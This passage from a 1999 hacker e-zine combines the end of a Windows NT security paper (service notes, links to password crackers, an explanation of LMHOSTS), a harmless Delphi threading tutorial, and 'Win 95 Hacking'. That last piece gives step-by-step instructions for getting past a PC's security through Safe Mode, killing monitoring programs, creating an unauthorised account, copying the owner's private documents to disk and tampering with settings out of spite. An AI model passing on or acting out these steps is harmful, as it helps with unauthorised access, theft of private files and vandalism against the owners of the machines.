telephony drivers and the properties for dialing. On a system that does not use any type of telephony or RAS devices should have this service disabled. UPS: This service is used in serial communication with an Uninterruptible Power Supply. WORKSTATION: This service allows for outbound NetBIOS connections. Because it is used in outbound connections only, it is normally not a security risk and should be set to automatic. =================================================================== APPENDIX E: URL's =================================================================== Sid Tools: http://www.technotronic.com/microsoft.html Eudpass: http://rhino9.ml.org/wardoc 1nf0ze: http://rhino9.ml.org/wardoc FireFTP: http://rhino9.ml.org/wardoc Grinder: http://rhino9.ml.org/software Glide: http://rhino9.ml.org/wardoc John The Ripper (DES Cracker): http://www.false.com/security/john/index.html WS_FTPBug: http://rhino9.ml.org/wardoc L0phtCrack (NT Password Cracker): http://www.l0pht.com PWDump: http://rhino9.ml.org/wardoc NAT: http://www.technotronic.com/microsoft.html =================================================================== APPENDIX F: THE LMHOSTS FILE =================================================================== Although most security professionals are used to working with a HOSTS file, WindowsNT actually uses two text files to resolve hostnames to their adresses. WindowsNT still uses a HOSTS file, but it also uses an LMHOSTS file. Much like a HOSTS file, an LMHOSTS is a flat, sequential text file that is used to resolve computer names (NetBIOS) to addresses. The LMHOSTS file also allows one to use keywords, which gives it greater functionality and flexibility than a HOSTS file. The keywords that the LMHOSTS file uses are #PRE, #DOM:domain, #INCLUDE filename, #BEGIN_ALTERNATE, and #END_ALTERNATE. If something follows a hash mark that is not one of these keywords, it is treated as a remark. #PRE: If this keyword follows an entry in an LMHOSTS file, it tells WindowsNT to pre-load that entry into the name cache. This allows the windows system to resolve the name much quicker. #DOM: The #DOM tag entry causes WindowsNT to associate that entry with whatever domain you specify (i.e. #DOM:accounting). This helps NT resolve certain names more efficiently because it does not have to consult routing tables to find out which domain the entry belongs in. #INCLUDE: This entry tells WindowsNT where to look for other LMHOSTS files that reside on other machines. When using this function, one should specify the UNC path to the other LMHOSTS file. The #BEGIN_ALTERNATE and #END_ALTERNATE are used in conjunction with the #INCLUDE tag and should appear before and after the #INCLUDE tag. =================================================================== RHINO9 SECURITY RESEARCH TEAM - HTTP://RHINO9.ML.ORG =================================================================== -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Window's Threads (by Chiraz) In this article, I want to hand out some examples to multi-threading in a window's environment, discuss it's uses, advantages and when you should use/not use them. I. What is a thread? Basically, a thread is a new path of execution for your processor. Do not confuse them with a real process, which stores much more information about it's origin in memory and really runs very different. It is also harder to communicate between processes then between threads run in a single process. When starting an application ALWAYS one thread of execution is started, called the primary thread. You can start other threads from this path to do, many times, a system heavy task, such as searching a hard drive for files, spooling large quantities of text to a printer or cycling text in a memo control. In my example, I will show you a caption bar cycler, which can directly be used in your delphi application (just neat). You'll be able to download it from the bottom of the page, so don't start copying and pasting yet :) In early versions of windows, threads weren't supported. However, multiple processes were (you can also refer to them as multiple tasks). This is why windows is called a 'multi-tasking' environment. Win3.1 though differs from '95 and up in the implementation of multi-tasking. In win3.1 applications give control back to windows to be able to share CPU cycles, this is called cooperative multi-tasking. However, in win9x (and much like UN*X works), processes get assigned CPU cycles. If execution is stopped for one cycle and given to the next, the first thread is said to be pre-empted. Hence, this implementation is called pre-emptive multi-tasking. II. When to use threads? First of all, threads do introduce new problems, especially with access to files, memory and (yes!) your objects and controls on the form. Because a running thread can loose normal 'synchronization' with others, it is wrong to assume that for instance creating three threads which all add 3 to a certain number and printing that to the screen, will result in successive numbers printed. To clarify, this is what you may get if you do not synchronize: 2 1 3 6 4 5 8 9 11 But before we delve too much into the theory, let's first examine the TThread object. This object is the way a thread is implemented by Borland. You can use the object to manage your thread by calling it's properties and methods, instead of basic and hard-coding the win API for this. When getting a thread in your program (click New | Thread Object and name it TCycleThread), all you'll see is: type TCycleThread = class(TThread) private {private declarations } protected procedure Execute; override; end; You see? not much here. Anyways, in order to have a thread, you have to keep it running (not really in all cases, but let's assume you're carrying out a task and on completion you'll destroy the thread again). There is one procedure to override, which is Execute. Overriding a procedure or function means not carrying out the method it has in it's ancestors. If in TObject Execute would mean for example printing an 'O' on the screen, this 'O' will never be seen when overriding. Some procedures need to be overridden, others don't. But consult other docs for that, we'll carry on with threads III. How to create threads? First, do this to the type declaration you've created before: type TCycleThread = class(TThread) private FNewStr: string; function TakeOutChars(var From: string): string; function MoveChars(From: string; x: integer):string; function SetSpaces(x: integer): string; procedure SetCaption; protected procedure Execute; override; end; Ok, so here you can see I have added four private functions and procedures. One global variable exists as FNewStr, this holds the string to cycle in your caption bar. They are private because they do not have to be called from other objects or modules. It's good practice to supply the proper access to your functions and procedures, because it speeds up a bit and also you're less prone to make mistakes. In order for one thread to work, we have to give it a 'thing' to do.... so let's do it by implementing the Execute procedure: procedure TCycleThread.Execute; var Temp : string; Medium : integer; x: integer; amount: integer; textlen: integer; begin textlen := Length(FunkyCaption); FreeOnTerminate := True; for x:=0 to Length(FunkyCaption)-1 do Temp := Temp + Copy(FunkyCaption, textlen-x, 1); FNewStr := Temp; Synchronize(SetCaption); for x:= 1 to Length(FunkyCaption) div 2 do begin Temp := TakeOutChars(Temp); FNewStr := setspaces(x)+Temp; Synchronize(SetCaption); sleep(75); end; Delete(FNewStr,1,1); Insert(Copy(FunkyCaption, (Length(FunkyCaption) div 2), 1), FNewStr, (Length(FunkyCaption) div 2)); for x:= 1 to (Length(FunkyCaption) div 2) do begin FNewStr := MoveChars(FunkyCaption, x); Synchronize(SetCaption); sleep(50); end; end; Ok, so what we see here is a bad example of coding... nonetheless, it displays the goal of this article. FunkyCaption is declared as a global variable to the mainForm unit, which caption is used to cycle our text in. Because it is global and public, it can also be accessed from other modules (look at a thread in the way of a module, albeit slightly different). Btw, Q for the gurus, any drawbacks on using global vars using threads compared to passing on the var in the constructor? You can see I set the FreeOnTerminate property to True... Since I have declared TCycleThread in my own MainForm unit, but within the TCycleThread prefix, I can access the methods and properties of this type. FreeOnTerminate is a property that can be set to let the thread automatically be killed when it's done executing. If this is not done, you have to do this yourself, so let's leave it on for now. The synchronize function is very special. Basically, what happens when calling it is a hidden thread window is created by the primary thread. Because a thread can pass parameters and other shit to this window, it is used to synchronize data to update controls on your form. One thing I must say is: ALWAYS USE Synchronize() WHEN UPDATING YOUR FORM!!! This is done because you want your application to be thread-safe. It is possible to update your form directly from the thread, but regarding access to the main form, you're not sure which thread has access and when, it may corrupt and crash your program. Moving on to the other stuff, I'll paste some other functions for cycling the text in the next paragraphs: Procedure TCycleThread.SetCaption; begin MainForm.Caption := FNewStr; end; function TCycleThread.SetSpaces(x: integer): string; var K: integer; thestr: string; begin thestr:=''; for k:=1 to x do thestr:=thestr+' '; result := thestr; end; function TCycleThread.TakeOutChars(var From: string): string; var j: integer; begin j:=Length(From); Delete(From,j,1); Delete(From,1,1); Result := From; end; function TCycleThread.MoveChars(From: string; x: integer):string; var j:integer; temp1 : string; begin j:= Length(From); temp1 := FNewStr; Delete(temp1,1,1); Delete(temp1,j,1); Insert(Copy(From, (j div 2)-x, 1), Temp1, (j div 2)-x); Insert(Copy(From, (j div 2)+x,1), temp1, (j div 2)+x); Result := temp1; end; Okay, so maybe the code can be optimized much and C++ programmers will think shit of it, but I just don't have access to the power-functions like a C-library does and this code displays more of the things actually happening... Anyway, compiling this (first copy and paste these things or the thing you have downloaded inside your MainForm unit), you still don't see anything happening... for what? TCycleThread.Create(False); You need to instantiate a TCycleThread object first. It's simply done by using this code. If using a separate module for a thread, you first have to import it's unit into the uses clause. Well, this code then should instantiate it for you and if you've set the FunkyCaption var to some nice text, perhaps even read it from the registry at formcreate (done, so it's possible), you can have the text cycled in the caption bar at startup (idea was actually taken from X-Treme IRC)... There are various pitfalls to look at though... Since the form is updated from within the primary thread (by processing the queue), suspending the primary thread with a sleep() operation or simply putting a lot of pressure on the primary thread may slow down or even stop the cycling in the caption bar. Make sure you give the primary thread some breathing space, perhaps by creating OTHER threads which will do the same things for you... For instance, I have made an app that will do the following at startup: 1. Cycle the text in the caption bar 2. Read from an .ini file, put it in a combobox and display in a memo control 3. play a video 4. play sound 5. read some arbitrary text and display in another memo 6. create random ascii codes and display in yet another memo control hehe... and all at the same time, so it's really loading the CPU, cannot really have other apps running at the same time, since it will gibber the video or sound... Other threads can easily be created using the previous example. You might want to instantiate controls at runtime and place them somewhere, which will make it easier to destroy them when a thread exits. You can determine the execution of a thread to let the OnTerminate event point to a procedure on the mainform for instance and increment a global integer or something. IV. More about threads... Let's conclude with giving some hints on what is possible with threads. You can set priorities and schedules of threads to run on certain times. A process is prioritized on the system, but threads can be relatively prioritized TO this process... Processes have four distinct priorities, while threads display 7... If you need to synchronize threads, because for instance information from a certain thread is needed in the other, you can do this with something called Critical Sections. They are the most straightforward way to do it. It is declared in Delphi as a TRTLCriticalSection, which basically means it's another record in the RunTimeLibrary... it means one thread gets execution time while other threads are put to sleep until the first thread 'leaves' the critical section and wakens up the next thread to execute... Another way besides Critical sections is using more of the Windows API to synchronize... this can be done with mutexes, where the threads are synchronized OUTside the process, say across the process boundary to handle it's execution... Using semaphores, which build on mutexes, it is possible to assign access to a pre-determined number of threads using resource counting. This gives you added functionality in managing threads and what to do to each of them. Finally, using threads, you can make your applications much more powerful. For instance a search procedure on your hard disk will certainly lock up your primary thread if not using multi-threading. Normal coders work around this by calling Application.ProcessMessages() within the loop they are using. But wouldn't it be great to use threads instead? Then the user can normally continue with the application, albeit in a slower context, but functionality is not put down... using memory mapped files for searching withIN files, you can create a very powerful searching app that will look for words in files, without taking up too much memory. If text files or other files (err... word filez? :) are > 10 Meg, which is often the case, you can create your own algorithm to search for specific keywords without loading the complete file into memory... But that's another topic For now, use threads with care, explore their use, and see how your app can be given more interactivity and degrade your system availability :) by Chiraz If you put it on the MainForm unit, place it after the {$R .DFM} compiler directive just below the uses clause in the implementation part (that is below the type declaration of the mainform) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- WIN 95' HACKING (By El Salvador) 3/1/1999 "This text is for a informational purposes only, i take no responsbility what so ever for what you do with this text or knowledge what so ever" -El Salvador... ONLY WORKS FOR IBM COMPUTERS Index: 1. Things You Will Need. 2. How To Get By Security. 3. How To Get By All Disabling Programs. 4. Hidden FILES, DIRECTORIES, ETC. 5. IMPORTANT. Chapter 1 You will need access to a computer terminal (Able To Touch The Computer). Next you will need about 15 minutes at the terminal. And a blank disk (Two Or a Really high density disk 3-5 megabytes). Chapter 2 Hold down SHIFT when you boot up your computer! Because if you do then it will start up in SAFE MODE and it will bypass security giving you full access, so far this has always worked on all the IBM's i have ever done this with. This will give you full access. It might give you a message saying key stuck or some crap. And when it starts up it should give you a message saying it started in SAFE MODE for some reason. This will turn off all disabling programs and such. note: I think this only works in win98' and win95'. Once inside make your own USER so you can access the computer with a legitemate USERNAME AND PASSWORD. SEE chapter 5 on how to do that. Chapter 3 Lets cut the crap on how good IBM's are they weren't built very well because, yes they might have thought it was good at the time but if you press Ctrl+Alt+Del you will get a little box asking you what program you want to shut down if you still can't tell what to do your a little messed up but what you do is find the name of the disabling program whatever, and close it down, it calls it END TASK for some crappy reason. I HATE YOU BILL GATES! Chapter 4 All you have to do is go to My Computer and highlight the object you want hidden and while it is still selected go to the File option up in the corner and click properties you get a box saying what it normally is and there should be a few boxs you can click inside it saying [] hidden [] read only [] archive, clicking on the inside of the hidden boxs makes it hidden. note: (It doesn't disapear right away) clicking the read only makes it so that you can only view it no changing or anything all they can do is view it, and the archive thing is crap! Now once you have clicked the hidden click "OK" now go to the view and click options, it should give you a box click on the words that say view up near the top, it will now display view options click HIDE FILES OF THESE TYPES and click OK, If it didn't disappear go to view and click REFRESH. Chapter 5 1. Creating your own USER: go to SETTINGS under start, click control panel, click on the user folder or the one with heads on it, you should get a box which tells all the users on the machine there will also be a button called NEW USER... 2. Copy all private documents in the computer also all in the trash to those TWO EMPTY DISKS... 3. Right click on the mouse and click on preferences and mess around with them a ALOT to piss them off. by El Salvador... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Now its possible to get the United Hackers Association Magazine for FREE into your mailbox! Go to our Homepage and select "Subscribe UHA Newsletter" or subscribe direct: http://uha1.listbot.com -or- http://www.uha1.com/cgi-bin/mail.cgi -or- http://www.uha1.com/cgi-bin/cgiwrap/uha1/mail.cgi (at least one of them should work!) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= If you want to join UHA, please take a look into our join-section on our Homepage! We are also interested in alliances with other Hacking Groups. Greetings all memberz of UHA! -=[ United Hackers Association 1 ]=- Email : webmaster@uha1.com Homepage : http://www.uha1.com/ (after the uha is a ONE!) (if (www.uha1.com!=result) try http://come.to/UHA) ******************************* EOF *******************************